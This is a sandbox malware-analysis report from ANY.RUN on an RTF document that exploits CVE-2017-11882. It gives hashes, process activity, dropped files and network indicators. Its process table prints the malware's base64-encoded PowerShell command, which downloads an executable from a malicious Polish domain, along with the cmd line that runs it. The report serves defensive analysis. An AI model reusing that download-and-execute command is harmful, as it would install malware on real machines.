Malware analysis SPEC-EBG250.doc Malicious activity | ANY.RUN

Add for printing

File name:	SPEC-EBG250.doc
Full analysis:	https://app.any.run/tasks/935404f7-a2a0-4879-8694-9375174e23fb
Verdict:	Malicious activity
Analysis date:	May 24, 2019, 11:05:28
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	exploit CVE-2017-11882
Indicators:
MIME:	text/rtf
File info:	Rich Text Format data, version 1, unknown character set
MD5:	6E88E18466244444E7EBAD4D1F6A73C2
SHA1:	42476E1CEE0DF92D6EBDA45BCABC50F7AB7AF021
SHA256:	1402032D473A96282142533BD1DEC00DCDBEA3B03545ED7CFB95DE59ED390510
SSDEEP:	24:GQhkHbGDX14mTzDXlI5xax9kCIzxVfsdDYTFe+xOX9ya6bUCUTmc0C2N1WBHShyo:BebGDvTzDXi5xokbzjEsTlzen2HwE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (73.0.3683.75)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Equation Editor starts application (CVE-2017-11882)
  - EQNEDT32.EXE (PID: 2888)
SUSPICIOUS
- Creates files in the user directory
  - EQNEDT32.EXE (PID: 2888)
  - powershell.exe (PID: 3136)
- Executes PowerShell scripts
  - EQNEDT32.EXE (PID: 2888)
- Executed via COM
  - EQNEDT32.EXE (PID: 2888)
- Reads internet explorer settings
  - EQNEDT32.EXE (PID: 2888)
- Executed via WMI
  - cmd.exe (PID: 1236)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 2792)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2792)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.rtf	\|	Rich Text Format (100)

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2792	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\SPEC-EBG250.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2888	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE		svchost.exe
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900
3136	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvAC8AaQAtAHYAbgBzAHcAZQB5AHUALgBwAGwALwBiAC8AZABvAHAAZQAuAGUAeABlACIALAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAbgB2AGIAYQBjAGsAZQBuAGQALgBlAHgAZQAiACkAKQA7AA==	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	—	EQNEDT32.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1236	cmd /c %temp%\nvbackend.exe	C:\Windows\system32\cmd.exe	—	wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

Add for printing

Total events

1 410

Read events

987

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2792	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRE33A.tmp.cvr		—
		MD5:—	SHA256:—
3136	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSFX5CSYPSGZ8AH3JC3P.temp		—
		MD5:—	SHA256:—
2888	EQNEDT32.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt		text
		MD5:FDAE9776561732E6D87946E11A32C0FA	SHA256:3EC16F331C22760FD79C55EF2FCEC4C2EA6175BF07B566E421AF9D1FA5328378
3136	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14edba.TMP		binary
		MD5:5F9A7BF5388376D94C2EDCA422810BEC	SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3136	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:5F9A7BF5388376D94C2EDCA422810BEC	SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2792	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$EC-EBG250.doc		pgc
		MD5:E02FBDF1DB9A6B9DEE72FF4931AD1627	SHA256:0341B3A90E6D65D66BDB380030E817BC0B3D8EA2D10D4F14A9F8EF994FF7008A
2792	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:52A3D3D71D281367630679E41B07A08A	SHA256:E61FD5FC3EA6B44799A0D33E6FEBD4F24CA03A9A9EBA9C37E2C34348A7E3FE18
2888	EQNEDT32.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\8B76wYMT[1].txt		html
		MD5:5A20C121D470C27F2BB1AC926B64EC1C	SHA256:B3D04A852AD0BE3397DDAC16EE8B476B3A903845DB6D90224CD0D9B1B5C0C2E7

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

No HTTP requests

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2888	EQNEDT32.EXE	104.20.208.21:443	pastebin.com	Cloudflare Inc	US	shared

DNS requests

Domain	IP	Reputation
pastebin.com	104.20.208.21 104.20.209.21	shared
i-vnsweyu.pl	—	malicious

Threats

No threats detected

Add for printing

No debug info

General Info

SPEC-EBG250.doc

6E88E18466244444E7EBAD4D1F6A73C2

42476E1CEE0DF92D6EBDA45BCABC50F7AB7AF021

1402032D473A96282142533BD1DEC00DCDBEA3B03545ED7CFB95DE59ED390510

24:GQhkHbGDX14mTzDXlI5xax9kCIzxVfsdDYTFe+xOX9ya6bUCUTmc0C2N1WBHShyo:BebGDvTzDXi5xokbzjEsTlzen2HwE

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Equation Editor starts application (CVE-2017-11882)

SUSPICIOUS

Creates files in the user directory

Executes PowerShell scripts

Executed via COM

Reads internet explorer settings

Executed via WMI

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings